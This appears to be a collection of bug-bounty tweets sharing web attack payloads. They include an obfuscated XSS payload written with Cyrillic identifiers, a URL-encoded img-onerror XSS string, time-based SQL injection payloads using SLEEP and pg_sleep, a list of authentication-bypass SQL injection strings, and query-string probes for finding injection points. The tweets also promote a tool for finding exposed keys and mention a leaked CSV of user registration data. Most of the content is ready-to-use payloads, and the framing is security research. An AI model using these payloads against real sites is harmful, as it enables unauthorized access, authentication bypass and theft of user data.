XSS Payload Written in Russian 🇷🇺
а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а],
з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('взломано')")()
Follow For More ����
#CyberSecurity #BugBounty #Hacking #EthicalHacking #XSS
Same payload, 3 different browsers: #Chrome, #Edge, #Firefox. So don’t just test using your default browser, make sure to test on every browser you have 😉
Payload: `%3cimg%2fsrc%2fonerror%3dalert%2f%2f%26NewLine%3b(2)%3e` #BugBounty
Simple test for SQL Injection on Web App ,
Common Injection Point's
1 URL Parameters
2 Form Inputs
3 HTTP Headers
4 Cookies
5 Hidden Fields
6 API Requests
7 Search Boxes
Tested Payloads are ' AND '+OR+SLEEP(5)--+
SQL Injection Payload
i was able to locate a SQL injection very hard to exploit , with digging I successfully got it with the sleep payload
''||(select 1 from (select pg_sleep(6))x)||'
==> i added as well to my SQL wordlist
happy hunting ♥
#bugbountytips #bugbountytip #bugbounty
Findsomething extension
it’s give more than amazing results just in 1 press
Keep it running and I assure you , it will save a lot of work for you / find some sensitive keys so quick
https://t.co/xMkOunjWQE
#bugbounty#bugbountytip#bugbountytips
Now SQL Injection - another Bypass Auth Payloads
#bugbountytips#bugbountytip
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or 1=1--
or true--
" or true--
' or true--
")or true--
') or true--
' or 'x'='x
) or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
A mini-thread on how I approached this "Stored XSS with CSP Bypass" together with @confievil and popped it on our second day of hunting on that target (1/x): 👇
#bugbounty
Bug Bounty Tips
This is how to find sql-Injection 100% of the time
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=")
/?q=')
/?q=-x()
#info#BugBountyTips#SQLinjection
Recently I found it .CSV file through https://t.co/rQdY34xIyX contains user registration details how I discovered here I mentioned all details https://t.co/51PaKtJ2EA
#BugBounty#bugbountytip#CYBER#infosec#Pentesting